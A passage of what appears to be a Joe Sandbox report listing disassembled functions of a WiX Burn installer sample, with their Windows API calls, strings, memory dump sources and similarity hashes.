package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
API String ID: 0-2033600224
Opcode ID: 6fed4334e1b7d71507b989d9604101547f347d0ca1f7d65baba2f5d7844ea477
Instruction ID: d38340c00c1edb21e970f811375d30725203980aa031f154ae9443c9a088327f
Opcode Fuzzy Hash: 6fed4334e1b7d71507b989d9604101547f347d0ca1f7d65baba2f5d7844ea477
Instruction Fuzzy Hash: D502C571940669AFDF229F54CE81FE977AAFF84724F0041A5F508A7252D732DEA0DB80

Function 009D1719 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 337COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 009D17B1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D17BB
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 009D1808
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D180E
CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 009D1848
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D184E
CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 009D188E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D1894
CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 009D18D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D18DA
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 009D191A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D1920
SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 009D1A11
SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 009D1A4B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D1A55
SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 009D1A8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D1A97
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009D1AD0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D1ADA
CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 009D1B18
LocalFree.KERNEL32(?), ref: 009D1B2E

Strings

srputil.cpp, xrefs: 009D17DC

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
String ID: srputil.cpp
API String ID: 267631441-4105181634
Opcode ID: 846093457c5157d5896af60e6b52b4466b8ef957a414921b08906625f159c4f8
Instruction ID: 22edac157e01106bff77f6663a4cebe83b30691ab465e2f2ffe82559da284310
Opcode Fuzzy Hash: 846093457c5157d5896af60e6b52b4466b8ef957a414921b08906625f159c4f8
Instruction Fuzzy Hash: B4C16377D8123DABDB208B959D48BDFFABCAF44750F0141ABA905F7250E7709D409EA0

Function 009BC332 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 376COMMON

Download Yara Rule

Strings

Failed to allocate memory for dependency providers., xrefs: 009BC6DE
Failed to copy repair arguments for related bundle package, xrefs: 009BC5D0
Failed to append relation type to repair arguments for related bundle package, xrefs: 009BC5F1
Failed to copy key for pseudo bundle., xrefs: 009BC542
Failed to copy local source path for pseudo bundle., xrefs: 009BC43B
Failed to copy install arguments for related bundle package, xrefs: 009BC584
-%ls, xrefs: 009BC34C
Failed to copy uninstall arguments for related bundle package, xrefs: 009BC623
Failed to copy display name for pseudo bundle., xrefs: 009BC74F
Failed to copy version for pseudo bundle., xrefs: 009BC72D
Failed to append relation type to uninstall arguments for related bundle package, xrefs: 009BC644
Failed to append relation type to install arguments for related bundle package, xrefs: 009BC5A9
Failed to copy cache id for pseudo bundle., xrefs: 009BC55F
Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 009BC385
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 009BC3BE
pseudobundle.cpp, xrefs: 009BC379, 009BC3B2, 009BC4A1, 009BC6D2
Failed to allocate memory for pseudo bundle payload hash., xrefs: 009BC4AD
Failed to copy key for pseudo bundle payload., xrefs: 009BC3F3
Failed to copy download source for pseudo bundle., xrefs: 009BC469
Failed to copy filename for pseudo bundle., xrefs: 009BC417

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
API String ID: 1357844191-2832335422
Opcode ID: 550b11702502d537e8f2c7a691aba2350bda30d9c5f8ffb6bf5163a8fa51066c
Instruction ID: 591744d926bfeaee1c794528b400ba54fe5ccc525f1c55ea0a70826082da62ee
Opcode Fuzzy Hash: 550b11702502d537e8f2c7a691aba2350bda30d9c5f8ffb6bf5163a8fa51066c
Instruction Fuzzy Hash: 2CC1F5B1604656FBCB26CF28CD91FAA77A9FF48724B10452AF905EB251DB70EC108BD0

Function 009945EE Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 141sleepshutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00994617
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0099461E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00994628
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00994678
GetLastError.KERNEL32 ref: 00994682
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 009946C6
GetLastError.KERNEL32 ref: 009946D0
Sleep.KERNEL32(000003E8), ref: 0099470C
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 0099471D
GetLastError.KERNEL32 ref: 00994727
CloseHandle.KERNEL32(?), ref: 0099477D

Strings

Failed to get shutdown privilege LUID., xrefs: 009946B0
engine.cpp, xrefs: 0099464C, 009946A6, 009946F4, 0099475E
Failed to adjust token to add shutdown privileges., xrefs: 009946FE
SeShutdownPrivilege, xrefs: 0099466B
Failed to schedule restart., xrefs: 00994768
Failed to get process token., xrefs: 00994656

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
API String ID: 2241679041-1583736410
Opcode ID: 40c109fa71147f5f20723eef4d14a8121cca87bd7b12ab78da27427fc90a0bf9
Instruction ID: dc5490bb15a3c75fa66ee19ec6b8d4a2b50968636fa754090ff913c1d317f402
Opcode Fuzzy Hash: 40c109fa71147f5f20723eef4d14a8121cca87bd7b12ab78da27427fc90a0bf9
Instruction Fuzzy Hash: 9741F873A9122AEBDF215BE98D46F6F7A5CAB41B54F124126BE00BA280D7248C0196E1

Function 009A4EDF Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 165pipeCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 009A4F0D
GetLastError.KERNEL32(?,00000000,?,?,0099452F,?), ref: 009A4F16
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0099452F,?), ref: 009A4FB8
GetLastError.KERNEL32(?,0099452F,?), ref: 009A4FC5
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,0099452F), ref: 009A5040
GetLastError.KERNEL32(?,?,?,?,?,?,?,0099452F,?), ref: 009A504B
CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0099452F,?), ref: 009A508B
LocalFree.KERNEL32(00000000,?,0099452F,?), ref: 009A50B9

Strings

\\.\pipe\%ls.Cache, xrefs: 009A500C
pipe.cpp, xrefs: 009A4F3A, 009A4FE9, 009A506F
D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 009A4F08
Failed to allocate full name of pipe: %ls, xrefs: 009A4F84
Failed to allocate full name of cache pipe: %ls, xrefs: 009A5022
Failed to create pipe: %ls, xrefs: 009A4FF6, 009A507C
\\.\pipe\%ls, xrefs: 009A4F6E
Failed to create the security descriptor for the connection event and pipe., xrefs: 009A4F44

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 1214480349-3253666091
Opcode ID: 593fbf1823de9c41422fab228e039d58f79916da6e8b7bc56e21b755c5259daa
Instruction ID: 794a18ffb7b96f982fece9c22b3bd28db1a96bc3828294ad8f4420f68042342b
Opcode Fuzzy Hash: 593fbf1823de9c41422fab228e039d58f79916da6e8b7bc56e21b755c5259daa
Instruction Fuzzy Hash: 2A51F532E81629FFDF219B95CC46BAEBB68AF45720F120125FE14B6280D3B55E409AD0

Function 009CFA62 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 173encryptionfileCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,009A9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 009CFAC7
GetLastError.KERNEL32 ref: 009CFAD1
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 009CFB0E
GetLastError.KERNEL32 ref: 009CFB18
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 009CFB5F
ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 009CFB83
GetLastError.KERNEL32 ref: 009CFB8D
CryptDestroyHash.ADVAPI32(00000000), ref: 009CFBCA
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 009CFBE1
GetLastError.KERNEL32 ref: 009CFBFC
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 009CFC34
GetLastError.KERNEL32 ref: 009CFC3E
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 009CFC77
GetLastError.KERNEL32 ref: 009CFC85

Strings

cryputil.cpp, xrefs: 009CFBB1

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
String ID: cryputil.cpp
API String ID: 3955742341-2185294990
Opcode ID: bcea97f1bef9e4f3638351bdc861be30d7e7633f45ece1148d814d806f6dd1d2
Instruction ID: 412190c6a88ff1acbeed88f97268bb96f4267fdc9dd1a2554a491ef56724d7e5
Opcode Fuzzy Hash: bcea97f1bef9e4f3638351bdc861be30d7e7633f45ece1148d814d806f6dd1d2
Instruction Fuzzy Hash: FD51E637E81139ABDB318A51CC25FDA7669AB04751F0240BABE4CF6180E7749D809AE1

Function 009A9E9E Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON

Download Yara Rule

Strings

copying, xrefs: 009AA030, 009AA038
Failed to get cached path for package with cache id: %ls, xrefs: 009A9EC8
moving, xrefs: 009AA029
Failed to reset permissions on unverified cached payload: %ls, xrefs: 009A9FF1
Failed to transfer working path to unverified path for payload: %ls., xrefs: 009A9FA4
Failed to create unverified path., xrefs: 009A9F6E
Failed to move verified file to complete payload path: %ls, xrefs: 009AA06C
Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 009A9FCB
Failed to concat complete cached path., xrefs: 009A9EF4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
API String ID: 0-1289240508
Opcode ID: 4893763ec29d2097fe86acde6664fb49bbe2fe63712e38344102345eb3b6ad60
Instruction ID: 15c429b8cafa116222528f3040cbb0e6e891837eb2f4c0082c25787853175ab0
Opcode Fuzzy Hash: 4893763ec29d2097fe86acde6664fb49bbe2fe63712e38344102345eb3b6ad60
Instruction Fuzzy Hash: 6F517F31D45129FBDF236A94CC02FAE7B76AF56750F144152FA00B62A1E7728E60EBC1

Function 009962AA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 009962F8
GetLastError.KERNEL32 ref: 00996302

Strings

Failed to get OS info., xrefs: 00996330
Failed to set variant value., xrefs: 00996423
variable.cpp, xrefs: 00996326

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastVersion
String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
API String ID: 305913169-1971907631
Opcode ID: f71f1839f88fea2dfd99a0738214bb7da6d93d3f83f9f3805e133e40a3ba77b4
Instruction ID: 4af69d6252d47597cfbb3cb93337913fe876a6d7a36d30311740bf1db6f4b431
Opcode Fuzzy Hash: f71f1839f88fea2dfd99a0738214bb7da6d93d3f83f9f3805e133e40a3ba77b4
Instruction Fuzzy Hash: BD419472A05228ABDF209B9DCC46FEF7BBCEB85760F00059AF545E7250D6349E81CB90

Function 00996037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00996062
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00996076
GetLastError.KERNEL32 ref: 00996088
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 009960DC
GetLastError.KERNEL32 ref: 009960E6

Strings

Failed to get the Date., xrefs: 0099610B
Failed to get the required buffer length for the Date., xrefs: 009960AD
Failed to set variant value., xrefs: 00996124
variable.cpp, xrefs: 009960A3, 00996101
Failed to allocate the buffer for the Date., xrefs: 009960C4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: DateErrorFormatLast$SystemTime
String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
API String ID: 2700948981-3682088697
Opcode ID: 4e89f2535fbfa59cd1e351258dff9ac436245372b9fda7b48801f90852bfe982
Instruction ID: 55b9cff2e12d2fb1d8a97fa7b2fb56536dbb06ca664761bd9ea2b909c9722fd2
Opcode Fuzzy Hash: 4e89f2535fbfa59cd1e351258dff9ac436245372b9fda7b48801f90852bfe982
Instruction Fuzzy Hash: 4431DD72A8522A6BDF219BEDCC82FBF7B78AB44714F114426FF00F7281D6619D4096E1

Function 009CFEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(009FB5FC,00000000,?,?,?,?,009B12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009CFEF4
GetCurrentProcessId.KERNEL32(00000000,?,009B12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009CFF04
GetCurrentThreadId.KERNEL32 ref: 009CFF0D
GetLocalTime.KERNEL32(8007139F,?,009B12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009CFF23
LeaveCriticalSection.KERNEL32(009FB5FC,009B12CF,?,00000000,0000FDE9,?,009B12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009D001A

Strings

%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 009CFFC0

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
API String ID: 296830338-59366893
Opcode ID: 59f4489f28fcebf47a12e034c7dcfe73bc82d0cc159b8fdb89ef341fcd14e272
Instruction ID: 24e77073f8b6e3a8ce482e72424447439fa66004e43d67051a9c54dd51505931
Opcode Fuzzy Hash: 59f4489f28fcebf47a12e034c7dcfe73bc82d0cc159b8fdb89ef341fcd14e272
Instruction Fuzzy Hash: 85419071E4521DEBDF219FA4DC15BBEB7B9EB48B11F15402AFA00E6250D7348D80DBA2

Function 009A9B43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 009A9BF2
lstrlenW.KERNEL32(?), ref: 009A9C19
FindNextFileW.KERNEL32(00000000,00000010), ref: 009A9C79
FindClose.KERNEL32(00000000), ref: 009A9C84

Part of subcall function 00993CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00993D40
Part of subcall function 00993CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00993D53

Strings

.unverified, xrefs: 009A9B86
*.*, xrefs: 009A9BCC

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
String ID: *.*$.unverified
API String ID: 457978746-2528915496
Opcode ID: 9ae1ea80aca597ab62d2a20afa171d586b7fe897aed95bafade9de95026915c6
Instruction ID: 5396c8622443009ed8eb39bfe9634c8675897cd0034f3ff2255fcacd9941a185
Opcode Fuzzy Hash: 9ae1ea80aca597ab62d2a20afa171d586b7fe897aed95bafade9de95026915c6
Instruction Fuzzy Hash: BB41823090192CAEDF21AB64DD4DBEA77B8BF85311F4041A1E948E10A0EB718EC4DF94

Function 009D887B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 009D88D0
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 009D88E2

Strings

feclient.dll, xrefs: 009D88AA
crypt32.dll, xrefs: 009D88A0
%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 009D892D
%04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 009D88B9

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Time$InformationLocalSpecificSystemZone
String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
API String ID: 1772835396-1985132828
Opcode ID: b8d56b009825ca0116fa536776b69cf7761caa6cb588e1ebfb789575665ac4c2
Instruction ID: 86539f40a57c90db7edfe494b25338aa42765514ba9bea8e9b0ae350a8d96116
Opcode Fuzzy Hash: b8d56b009825ca0116fa536776b69cf7761caa6cb588e1ebfb789575665ac4c2
Instruction Fuzzy Hash: 5B21FAA6901118EADB60DB99DC05FBFB3FCEB5C711F004556B955D2180E7389A90D770

Function 009CAA0E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 009CAB54

Strings

1#SNAN, xrefs: 009CBD53
1#INF, xrefs: 009CBD61
1#QNAN, xrefs: 009CBD5A
1#IND, xrefs: 009CBD4C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: ca21b56e0a7d5ab8bc3e094fd61be4293078b5214f2ba42e81bd6f0a22f17362
Instruction ID: 71519be9939c3d9532fbf8408e57aeebe608c7cddbc6bf66514c62b199ae7d57
Opcode Fuzzy Hash: ca21b56e0a7d5ab8bc3e094fd61be4293078b5214f2ba42e81bd6f0a22f17362
Instruction Fuzzy Hash: CFC23F71E046288FDB25CE28DD41BEAB7B9EB84305F1545EED44DE7240E778AE818F42

Function 009961DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0099620F
GetLastError.KERNEL32 ref: 00996219

Strings

Failed to get the user name., xrefs: 00996242
Failed to set variant value., xrefs: 0099625E
variable.cpp, xrefs: 00996238

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

